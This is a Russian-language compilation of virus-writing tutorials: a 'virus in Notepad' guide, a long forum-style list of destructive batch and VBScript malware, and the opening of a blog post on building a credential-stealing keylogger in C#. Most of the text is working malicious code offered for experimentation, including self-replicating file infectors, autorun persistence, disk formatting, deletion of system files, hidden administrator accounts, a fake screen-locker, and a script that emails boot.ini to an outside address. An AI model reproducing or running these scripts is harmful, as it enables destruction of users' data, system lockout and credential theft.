Вирусы через блокнот

Не думайте, пожалуйста, что знания о том, как пишутся вирусы, нужны только вирусописателям! В целях компьютерной безопасности они не менее важны и простым пользователям. Даже поверхностное понимание того, как написать вирусы в блокноте, поможет защитить компьютер от многих неприятностей.

Пишем вирус в блокноте

Вот так выглядит вирус, набранный в обыкновенном блокноте, который есть в составе любой системы от Microsoft Windows. Но знайте — это сложно назвать вирусом, просто системные команды, они сохраняются в формате .bat. Для изменения расширений, нужно настроить систему:

  • Открываем «Компьютер»
  • Заходим верхнее в меню «Сервис», если не видно жмем ALT
  • В этом меню заходим в «Сервис» выбираем пункт «Параметры папок»
  • Заходим во вкладку «Вид» и ищем пункт «Скрывать расширения для зарегистрированных типов файлов»
  • Убираем галочку с этого пункта.

С первого взгляда ничего страшного — всего несколько коротких слов-команд. Но на деле, если поместить этот файл в системную папку «system32\drivers\etc» и прописать его в автозагрузку, чтобы он запускался при загрузке системы, то, после перезапуска компьютера, невозможно будет открыть какую-либо программу или выбрать другое действие на рабочем столе. Не рекомендуется повторять эти действия, если нет навыков работы с системным реестром!

Вместо telnetdrive.bat попробуйте вписать безопасные команды для запуска: Calc (калькулятора), Taskmgr (диспетчера задач) или Mspaint (программы рисования)

С чего начать

Пришло время изучить небольшую общую инструкцию по «изготовлению» таких файлов.

  • Первым делом открываем блокнот;
  • Заносим туда команды, т.е. создаём в нём «тело» вируса;
  • Сохраняем свой труд через Файл -> Сохранить как;
  • Теперь осталось изменить расширение файла .txt на .bat и, вместо сохранённого названия, вписать нужное, которое будет использоваться.

Создаём первый файл-вирус

Простой вирус написан и сохранён в файл. Теперь бы неплохо узнать, что же прописали в тело вируса, сохранённого в файле.

Начинаем разбираться по порядку с первой строки:

  1. @Echo off – без этой команды всё, что написано, высвечивалось бы на экране монитора.
  2. Date11.14 – указывает на дату создания.
  3. If exist c:sky.bat goto abc – проверка существования на диске С файла sky.bat и если его нет
  4. Copy %0 c:sky.bat – размножает себя, изменив первоначальное имя файла на sky.bat
  5. Attrib +h c:sky.bat – скрывает созданный файл от посторонних глаз.
  6. Echo c:sky.bat >>autoexec.bat – вирус прописывается в автозагрузку.
  7. :abc – если он есть, выполнение программы перейдёт сюда.

Далее идут небольшие шалости:

  1. md CRECK – создаёт нужную или ненужную папку, смотря какая цель у создателя вируса.
  2. md NEW – такими папками можно заполнить весь жёсткий диск у пользователя.
  3. Label E: LUZER – прописывает название логического диска Е. В данном случае LUZER.
  4. assoc .exe=.mp3 – расширение .exe будет ассоциироваться, как .mp
  5. del c:Program Files /q –всё, что было в папке Program Files удалится.
  6. del *.* /q – из каталога, где находится вирус, удалится всё, кроме папки с самим вирусом.

Повеселились достаточно, подумаем и о законе:

  1. del %0 – вирус наделает дел и удалит сам себя.

Осталось последнее, узнать, как же его прячут. Просто! Переформатируют файл из расширения .bat в .exe при помощи архиватора WinRAR. При создании архива помечают – «Создать архив SFX» и устанавливают отметку «Выполнить после распаковки». Естественно, указывают настоящее имя, под которым создан вирус.

Как написать Вирус [Для начинающего]

Всем привет
Чтобы написать вирус Нам понадобиться
Блокнот и прямые Руки))
Ну, раз уж мы решили начать с самого простого, то свой первый вирус создадим в обычном текстовом редакторе, встроенном в Windows. Такой вирус будет называться BAT-вирусом.
По мере написания исходника, в фигурных скобках буду пояснять о чем речь.
@Echo off {запрещаем вывод на экран исполняемых команд}
copy %0 c:virus.bat >nul {копируем файл; запрещаем вывод на экран самой команды и результата её действия}
echo c:virus.bat>>c:autoexec.bat {добавляем текст в уже существующий файл}
Вот и все! Проще не бывает! Это пример одного из самых простых bat-вирусов. Хотя с полной уверенностью сказать, что это вирус, значит сказать ерунду. Посмотрите на то, что написано в фигурных скобках и вы поймете, что это просто пример того, как сделать основу вируса. Продолжаю:
@Echo off
copy %0 c:virus.bat >nul
echo c:virus.bat>>c:autoexec.bat
copy %0 a:run.bat >nul {копируем этот файл на дискету, если таковая имеется в дисководе (копирование произойдет при перезагрузке компа)}
Таким образом к предыдущему исходнику я добавила одну строку и вирус приобрел новую способность: он теперь умеет заражать другие компы через дискету.
@Echo off
copy %0 c:virus.bat >nul
attrib +h c:virus.bat >nul {устанавливаем файлу virus.bat атрибут «скрытый» (файл virus.bat наверняка попадется юзеру на глаза и будет их мозолить, поэтому делаем его скрытым)}
echo c:virus.bat>>c:autoexec.bat
copy %0 a:run.bat >nul
Вот, наш исходник начинает приобретать очертания вируса!
@Echo off
if exist c:virus.bat goto ski {проверяем, существует ли файл, …}
copy %0 c:virus.bat >nul
attrib +h c:virus.bat >nul
echo c:virus.bat>>c:autoexec.bat
:ski {…если он существует, то программа переходит на метку :ski}
copy %0 a:run.bat >nul
Добавила еще одну команду «if exist». Теперь вирус уже будет проверять, есть ли этот файл, и если он есть, то уже не будут выполняться лишние команды. Только скопирует себя на дискету и все.
Теперь модернизируем наш вирус до конца.
@echo off%% {выводим на экран текст «Meteor»}
if ‘%1==’In_ goto Meteo {если переменная %1 равна In, то переходим к метке «:Meteo»}
if exist c:Meteor.bat goto Mete {проверяем, существует ли файл Meteor.bat, если да, то переходим к метке «:Mete»}
if not exist %0 goto Met {если файл не существует, то переходим к метке «Met»}

find «Meteor»c:Meteor.bat {проверяем, есть ли файл meteor на диске, если нет, то копируем его туда}
attrib +h c:Meteor.bat {делаем файл скрытым}
:Mete {метка}
for %%t in (*.bat) do call c:Meteor In_ %%t {выполняем одну команду (call — позволяет вызвать один пакетный файл из другого) для нескольких параметров t} {т.е. вирус находит файл с расширением .bat, и заражает его с помощью команды type, дописывая себя к найденному .bat-файлу}
goto Met {перейти к метке}
:Meteo {метка}
find «Meteor»nul {указываем файлу значение 2 и запрещаем вывод команды и ее результата на экран}
if not errorlevel 1 goto Met {если не произошло ошибки (с кодом 1) выполнения предыдущей команды, то переходим на метку}
type c:Meteor.bat>>%2 {дописываем «себя» к найденному .bat-файлу}
:Met {метка}
Вот это уже можно назвать более или менее полноценным вирусом!
Для того чтобы вирус стал вирусом, его нужно сохранить с расширением BAT. Жмем «Сохранить как», пишем например virus.bat, и там куда вы его сохраните появится пакетный файл MS-DOS.
На основе этого исходника можно создавать другие вирусы. Экспериментируйте, модернизируйте, пробуйте написать свой вирус. Скажу к слову, что используя этот исходник, я сделал из него еще три модификации. И это не предел! Возможности не ограничены, все зависит от вашей фантазии.
Приведу еще один простой, но интересный пример:)
@Echo off
Echo format C: /q >> c:Autoexec.bat
Все! Ничего особенного, да? Этот вирус добавляет в autoexec.bat строку format C: /q и при перезагрузке компа происходит быстрое форматирование диска:)
И вот еще что:
Echo var WSHShell = WScript.CreateObject(«WScript.Shell»); > %temp%mes.js
echo WSHShell.Popup («ПИШИ СЮДА ЧТО УГОДНО»); >> %temp%mes.js
start %temp%mes.js
deltree /y %temp%mes.js
Добавь этот скрипт в свой вирус, вместо «ПИШИ СЮДА ЧТО УГОДНО» напиши свой текст (например, предсмертную речь для юзера:) ), и при запуске вируса вылезет окошечко с твоим сообщением!
На заметку файл мы сохраняем так Rango-Я не читал правила! «.bat» ← Обязательно
Еще пару bat кодов )) Вирусов.
Убирает рабочий стол
@echo off
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
Выключается компьютер
@echo off
shutdown -s -t 1 -c «lol» >nul
Перезагрузка компьютера
@echo off
shutdown -r -t 1 -c «lol» >nul
Запрещает запускать программы
@echo off
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul
Удаление дров
@echo off
del «%SystemRoot%\Driver Cache\i386\driver.cab» /f /q >nul
Удаляет звуки Windows
@echo off
del «%SystemRoot%\Media» /q >nul
Запрещает заходить в панель управления
@echo off
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer
/v NoControlPanel /t REG_DWORD /d 1 /f >nul
Запрещает комбинацию Ctrl-Alt-Delete
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
Меняет местами значение кнопок мыши
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul

Удаляет курсор мыши
del «%SystemRoot%Cursors*.*» >nul
Меняет название корзины
reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d ТУТ НАЗВАНИЕ КОРЗИНЫ /F
Убирает панель управления
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Серьезные вирусы
Удаляет ВСЕ с раздела\диска(не пытайтесь проверить у себя)
rd : /s /q
Удаляет все файлы в program files
del c:Program Files/q
Убивает процесс explorer.exe
taskkill /f /im explorer.exe >nul
Создает миллион папок
FOR /L %%i IN (1,1,1000000) DO md %%i
Удаляет все драйвера, которые установлены на компьютере
del «%SystemRoot%Driver Cachei386driver.cab» /f /q >nul
Удаляет команду DEL
del %0
Будет открывать бесконечно Пэинт
😡
Start mspaint
goto x
Изменяет расширение всех ярлыков на .txt
assoc .lnk=.txt
Заражает Autoexec
copy «»%0″» «%SystemRoot%\system32\batinit.bat» >nul
reg add «HKCU\SOFTWARE\Microsoft\Command Processor» /v AutoRun /t REG_SZ /d «%SystemRoot%\syste m32\batinit.bat» /f >nul
Создает нового пользователя, с правами администратора, логин:Я не читал правила! и пароль Я не читал правила! (Можете изменить)
@echo off
chcp 1251
net user SUPPORT_388945a0 /delete
net user Я не читал правила! Я не читал правила! /add
net localgroup Администраторы Я не читал правила! /add
net localgroup Пользователи SUPPORT_388945a0 /del
reg add «HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList» /v «support» /t reg_dword /d 0 y
сбой системы (!) — выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать.
rundll32 user,disableoemlayer
Меняет местами кнопки мыши,но обратная смена не возможна)
rundll32 user,SwapMouseButton
Удаляет ядро системы
del %systemroot%\system32\HAL.dll
Заражает *.jpg *.mp3 *.doc *.htm? *.xls. (Заражает
не только в текущем каталоге, но и надкаталоге)
@echo off%%
if ‘%1==’In_ goto MrWebin
if exist c:\MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find «MrWeb»<%0>c:\MrWeb.bat
attrib +h c:\MrWeb.bat
:MrWebru
for %%g in (..\*.jpg ..\*.doc ..\*.htm? *.jpg *.mp3 *.doc *.htm? *.xls) do call c:\MrWeb In_ %%ggoto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat>>%2.bat
echo start %2>>%2.bat%%
:MrWeben
Вирус заражает *.JPG в текущем каталоге
@echo off%%
if ‘%1==’In_ goto MrWebin
if exist c:\MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find «MrWeb»<%0>c:\MrWeb.bat
attrib +h c:\MrWeb.bat
:MrWebru
for %%g in (*.jpg) do call c:\MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat>>%2.bat
echo start %2>>%2.bat%%
:MrWeben
Жестокие вирусы
У вашего ламера будет глючить компьютер.
@echo off
echo Set fso = CreateObject(«Scripting.FileSystemObject») > %systemdrive%\windows\system32\rundll32.vbs
echo do >> %systemdrive%\windows\system32\rundll32.vbs
echo Set tx = fso.CreateTextFile(«%systemdrive%\windows\system32\rundll32.dat», True) >> %systemdrive%\windows\system32\rundll32.vbs

echo tx.WriteBlankLines(100000000) >> %systemdrive%\windows\system32\rundll32.vbs
echo tx.close >> %systemdrive%\windows\system32\rundll32.vbs
echo FSO.DeleteFile «%systemdrive%\windows\system32\rundll32.dat» >> %systemdrive%\windows\system32\rundll32.vbs
echo loop >> %systemdrive%\windows\system32\rundll32.vbs
start %systemdrive%\windows\system32\rundll32.vbs
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v system_host_run /t REG_SZ /d %systemdrive%\windows\system32\rundll32.vbs /f
Вирус который убивает Винду. Не проверяйте на своем компьютере=)
@echo This virus created by LIZA
@echo Virus: Я не читал правила!.ru™ Virus
@echo Autor: LIZA
@echo off
echo Chr(39)>%temp%\temp1.vbs
echo Chr(39)>%temp%\temp2.vbs
echo on error resume next > %temp%\temp.vbs
echo Set S = CreateObject(«Wscript.Shell») >> %temp%\temp.vbs
echo set FSO=createobject(«scripting.filesystemobject»)>>%temp%\temp.vbs
reg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodesktop /d 1 /freg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v ClassicShell /d 1 /fset ¶§=%0
copy %¶§% %SystemRoot%\user32dll.bat
reg add «hklm\Software\Microsoft\Windows\CurrentVersion\Run» /v RunExplorer32 /d %SystemRoot%\user32dll.bat /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoDrives /t REG_DWORD /d 67108863 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoViewOnDrive /t REG_DWORD /d 67108863 /f
echo fso.deletefile «C:\ntldr»,1 >> %temp%\temp.vbs
reg add «HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions» /v «NoSelectDownloadDir» /d 1 /f
reg add «HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown» /v «IExplorer» /d 0 /f
reg add «HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions» /v «NoFindFiles» /d 1 /f
reg add «HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions» /v «NoNavButtons» /d 1 /f
echo fso.deletefolder «D:\Windows»,1 >> %temp%\temp.vbs
echo fso.deletefolder «I:\Windows»,1 >> %temp%\temp.vbs
echo fso.deletefolder «C:\Windows»,1 >> %temp%\temp.vbs
echo sr=s.RegRead(«HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot») >> %temp%\temp.vbs
echo fso.deletefile sr+»\system32\hal.dll»,1 >> %temp%\temp.vbs
echo sr=s.RegRead(«HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot») >> %temp%\temp.vbs
echo fso.deletefolder sr+»\system32\dllcache»,1 >> %temp%\temp.vbs
echo sr=s.RegRead(«HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot») >> %temp%\temp.vbs
echo fso.deletefolder sr+»\system32\drives»,1 >> %temp%\temp.vbs
echo s.regwrite «HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\LocalizedString»,»forum.Я не читал правила!.ru™»>>%temp%\temp.vbs
echo s.regwrite «HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner»,»forum.Я не читал правила!.ru™»>>%temp%\temp.vbs

echo s.regwrite «HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization»,»forum.Я не читал правила!.ru™»>>%temp%\temp.vbs
echo on error resume next > %temp%\temp1.vbs
echo set FSO=createobject(«scripting.filesystemobject»)>>%temp%\temp1.vbs
echo do>>%temp%\temp1.vbs
echo fso.getfile («A:\»)>>%temp%\temp1.vbs
echo loop>>%temp%\temp1.vbs
echo on error resume next > %temp%\temp2.vbs
echo Set S = CreateObject(«Wscript.Shell») >> %temp%\temp2.vbs
echo do>>%temp%\temp2.vbs
echo execute»S.Run «»%comspec% /c echo «» & Chr(7), 0, True»>>%temp%\temp2.vbs
echo loop>>%temp%\temp2.vbs
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System» /v disabletaskmgr /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System» /v disableregistrytools /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum» /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoNetworkConnections /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v StartmenuLogoff /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoCommonGroups /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoFavoritesMenu /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoRecentDocsMenu /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoSetFolders /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoAddPrinter /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoFind /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoSMHelp /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoRun /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoClose /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoChangeStartMenu /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoSMMyDocs /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoSMMyPictures /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoControlPanel /t REG_DWORD /d 1 /f
echo set application=createobject(«shell.application»)>>%temp%\temp.vbs
echo application.minimizeall>>%temp%\temp.vbs
reg add «hklm\Software\Microsoft\Windows\CurrentVersion\run» /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /f
start rundll32 user32, SwapMouseButton
reg add «HKCR\exefile\shell\open\command» /ve /t REG_SZ /d rundll32.exe /f
echo i=50 >> %temp%\temp.vbs
echo while i^>0 or i^<0 >> %temp%\temp.vbs
echo S.popup «forum.Я не читал правила!.ru™»,0, «forum.Я не читал правила!.ru™»,0+16 >> %temp%\temp.vbs
echo i=i-1 >> %temp%\temp.vbs
echo wend >> %temp%\temp.vbs
echo do >> %temp%\temp.vbs
echo wscript.sleep 200 >> %temp%\temp.vbs
echo s.sendkeys»{capslock}» >> %temp%\temp.vbs
echo wscript.sleep 200 >> %temp%\temp.vbs
echo s.sendkeys»{numlock}» >> %temp%\temp.vbs
echo wscript.sleep 200 >> %temp%\temp.vbs
echo s.sendkeys»{scrolllock}» >> %temp%\temp.vbs
echo loop>> %temp%\temp.vbs
echo Set oWMP = CreateObject(«WMPlayer.OCX.7») >> %temp%\temp.vbs
echo Set colCDROMs = oWMP.cdromCollection >> %temp%\temp.vbs
echo if colCDROMs.Count ^>= 1 then >> %temp%\temp.vbs
echo For i = 0 to colCDROMs.Count — 1 >> %temp%\temp.vbs
echo colCDROMs.Item(i).eject >> %temp%\temp.vbs
echo next >> %temp%\temp.vbs
echo End If >> %temp%\temp.vbs
echo Call SendPost(«smtp.mail.ru», «forum.Я не читал правила!.ru™@mail.ru», «support@mail.ru», «…», «Копм заражен!») >> %temp%\temp.vbs
echo Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody) >> %temp%\temp.vbs
echo Set iMsg = CreateObject(«CDO.Message») >> %temp%\temp.vbs
echo Set iConf = CreateObject(«CDO.Configuration») >> %temp%\temp.vbs
echo Set Flds = iConf.Fields >> %temp%\temp.vbs
echo Flds.Item(«http://schemas.microsoft.com/cdo/config … /sendusing») = 2 >> %temp%\temp.vbs
echo Flds.Item(«http://schemas.microsoft.com/cdo/config … thenticate») = 1 >> %temp%\temp.vbs
echo Flds.Item(«http://schemas.microsoft.com/cdo/config … ndusername») = «support» >> %temp%\temp.vbs
echo Flds.Item(«http://schemas.microsoft.com/cdo/config … ndpassword») = «support» >> %temp%\temp.vbs
echo Flds.Item(«http://schemas.microsoft.com/cdo/config … smtpserver») = «smtp.mail.ru» >> %temp%\temp.vbs
echo Flds.Item(«http://schemas.microsoft.com/cdo/config … serverport») = 25 >> %temp%\temp.vbs
echo Flds.Update >> %temp%\temp.vbs
echo iMsg.Configuration = iConf >> %temp%\temp.vbs
echo iMsg.To = strTo >> %temp%\temp.vbs
echo iMsg.From = strFrom >> %temp%\temp.vbs
echo время смотреть в правила! = strSubject >> %temp%\temp.vbs
echo iMsg.TextBody = strBody >> %temp%\temp.vbs

echo iMsg.AddAttachment «c:\boot.ini» >> %temp%\temp.vbs
echo iMsg.Send >> %temp%\temp.vbs
echo End Function >> %temp%\temp.vbs
echo Set iMsg = Nothing >> %temp%\temp.vbs
echo Set iConf = Nothing >> %temp%\temp.vbs
echo Set Flds = Nothing >> %temp%\temp.vbs
echo s.run «shutdown -r -t 0 -c «»Я не читал правила!.ru™»» -f»,1 >> %temp%\temp.vbs
start %temp%\temp.vbs
start %temp%\temp1.vbs
start %temp%\temp2.vbs
Вирус полностью блокирует систему при следующем запуске Windows.Даже в безопасном режиме, выключает диспетчер задач.Чтобы разблокировать компьютер можно введя код 200393!(Но он не разблокирует)
@echo off
CHCP 1251
cls
Set Yvaga=На вашем компьютере найден вирус.
Set pass=Пароль
Set pas=Введите пароль.
Set virus=Чтобы разблокировать ПК вам потребуется ввести пароль
Set dim=Выключаю вирус…
title Внимание!!!
CHCP 866
IF EXIST C:\windows\boot.bat (
goto ok )
cls
IF NOT EXIST C:\windows\boot.bat (
ECHO Windows Registry Editor Version 5.00 >> C:\0.reg
ECHO. >> C:\0.reg
ECHO >> C:\0.reg
ECHO. >> C:\0.reg
ECHO «Shell»=»Explorer.exe, C:\\windows\\boot.bat » >> C:\0.reg
start/wait regedit -s C:\0.reg
del C:\0.reg
ECHO @echo off >>C:\windows\boot.bat
ECHO C:\WINDOWS\system32\taskkill.exe /f /im Explorer.exe >>C:\windows\boot.bat
ECHO reg add «HKCU\software\Microsoft\Windows\CurrentVersion\Policies\system» /v DisableTaskMgr /t REG_DWORD /d 1 /f >>C:\windows\boot.bat
ECHO start sys.bat >>C:\windows\boot.bat
attrib +r +a +s +h C:\windows\boot.bat
copy virus.bat c:\windows\sys.bat
attrib +r +a +s +h C:\windows\sys.bat
GOTO end)
:ok
cls
Echo %Yvaga%
echo.
echo %virus%
echo %pas%
set /a choise = 0
set /p choise=%pass%:
if «%choise%» == «101» goto gold
if «%choise%» == «200393» goto status
exit
:status
echo %dim%
attrib -r -a -s -h C:\windows\boot.bat
del C:\windows\boot.bat
attrib -r -a -s -h C:\windows\sys.bat
del C:\windows\sys.bat
cls
:gold
start C:\
:end
Добавляет программу в автозагрузку ОС
copy «»%0″» «%SystemRoot%\system32\File.bat»
reg add «HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run» /v «Filel» /t REG_SZ /d «%SystemRoot%\system32\File.bat» /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
Этот вирус,блокирует все программы,но интернет работает.

Пишем свое вредоносное ПО. Часть 1: Учимся писать полностью «не обнаружимый» кейлогер

Хакерский мир можно условно разделить на три группы атакующих:

1) «Skids» (script kiddies) – малыши, начинающие хакеры, которые собирают известные куски кода и утилиты и используя их создают какое-то простое вредоносное ПО.

2) «Byuers» — не чистые на руку предприниматели, тинэйджеры и прочие любители острых ощущений. Покупают услуги по написанию такого ПО в интернете, собирают с ее помощью различную приватную информацию, и, возможно, перепродают ее.

3) «Black Hat Сoders» — гуру программирования и знатоки архитектур. Пишут код в блокноте и разрабатывают новые эксплоиты с нуля.

Может ли кто-то с хорошими навыками в программировании стать последним? Не думаю, что вы начнете создавать что-то, на подобии regin (ссылка) после посещения нескольких сессий DEFCON. С другой стороны, я считаю, что сотрудник ИБ должен освоить некоторые концепты, на которых строится вредоносное ПО.

Зачем ИБ-персоналу эти сомнительные навыки?

Знай своего врага. Как мы уже обсуждали в блоге Inside Out, нужно думать как нарушитель, чтобы его остановить. Я – специалист по информационной безопасности в Varonis и по моему опыту – вы будете сильнее в этом ремесле если будете понимать, какие ходы будет делать нарушитель. Поэтому я решил начать серию постов о деталях, которые лежат в основе вредоносного ПО и различных семействах хакерских утилит. После того, как вы поймете насколько просто создать не детектируемое ПО, вы, возможно, захотите пересмотреть политики безопасности на вашем предприятии. Теперь более подробно.

Для этого неформального класса «hacking 101» вам необходимы небольшие знания в программировании (С# и java) и базовое понимание архитектуры Windows. Имейте ввиду, что в реальности вредоносное ПО пишется на C/C++/Delphi, чтобы не зависеть от фреймфорков.

Кейлогер

Кейлогер – это ПО или некое физическое устройство, которое может перехватывать и запоминать нажатия клавиш на скомпрометированной машине. Это можно представить как цифровую ловушку для каждого нажатия на клавиши клавиатуры.
Зачастую эту функцию внедряют в другое, более сложное ПО, например, троянов (Remote Access Trojans RATS), которые обеспечивают доставку перехваченных данных обратно, к атакующему. Также существуют аппаратные кейлогеры, но они менее распространены, т.к. требуют непосредственного физического доступа к машине.

Тем не менее создать базовые функции кейлогера достаточно легко запрограммировать. ПРЕДУПРЕЖДЕНИЕ. Если вы хотите попробовать что-то из ниже следующего, убедитесь, что у вас есть разрешения, и вы не несёте вреда существующей среде, а лучше всего делать это все на изолированной ВМ. Далее, данный код не будет оптимизирован, я всего лишь покажу вам строки кода, которые могут выполнить поставленную задачу, это не самый элегантный или оптимальный путь. Ну и наконец, я не буду рассказывать как сделать кейлогер стойким к перезагрузкам или пытаться сделать его абсолютно не обнаружимым благодаря особым техникам программирования, так же как и о защите от удаления, даже если его обнаружили.

Начнем.

Для подключения к клавиатуре вам всего лишь нужно использовать 2 строки на C#:

1. 2. 3. public static extern int GetAsyncKeyState(Int32 i);

Вы можете изучить больше про фунцию GetAsyncKeyState на MSDN:

Для понимания: эта функция определяет нажата клавиш или отжата в момент вызова и была ли нажата после предыдущего вызова. Теперь постоянно вызываем эту функцию, чтобы получать данные с клавиатуры:

1. while (true) 2. { 3. Thread.Sleep(100); 4. for (Int32 i = 0; i < 255; i++) 5. { 6. int state = GetAsyncKeyState(i); 7. if (state == 1 || state == -32767) 8. { 9. Console.WriteLine((Keys)i); 10. 11. } 12. } 13. }

Что здесь происходит? Этот цикл будет опрашивать каждые 100 мс каждую из клавиш для определения ее состояния. Если одна из них нажата (или была нажата), сообщение об этом будет выведено на консоль. В реальной жизни эти данные буферизируются и отправляются злоумышленнику.

Умный кейлогер
Погодите, а есть ли смысл пытаться снимать всю подряд информацию со всех приложений?
Код выше тянет сырой ввод с клавиатуры с любого окна и поля ввода, на котором сейчас фокус. Если ваша цель – номера кредитных карт и пароли, то такой подход не очень эффективен. Для сценариев из реального мира, когда такие кейлогеры выполняются на сотнях или тысячах машин, последующий парсинг данных может стать очень долгим и по итогу потерять смысл, т.к. ценная для взломщика информация может к тому времени устареть.

Давайте предположим, что я хочу заполучить учетные данные Facebook или Gmail для последующей продажи лайков. Тогда новая идея – активировать кейлоггинг только тогда, когда активно окно браузера и в заголовке страницы есть слово Gmail или facebook. Используя такой метод я увеличиваю шансы получения учетных данных.

Вторая версия кода:

1. while (true) 2. { 3. IntPtr handle = GetForegroundWindow(); 4. if (GetWindowText(handle, buff, chars) > 0) 5. { 6. string line = buff.ToString(); 7. if (line.Contains(«Gmail»)|| line.Contains(«Facebook — Log In or Sign Up «)) 8. { 9. //проверка клавиатуры 10. } 11. } 12. Thread.Sleep(100); 13. }

Этот фрагмент будет выявлять активное окно каждые 100мс. Делается это с помощью функции GetForegroundWindow (больше информации на MSDN). Заголовок страницы хранится в переменной buff, если в ней содержится gmail или facebook, то вызывается фрагмент сканирования клавиатуры.

Этим мы обеспечили сканирование клавиатуры только когда открыто окно браузера на сайтах facebook и gmail.

Еще более умный кейлогер

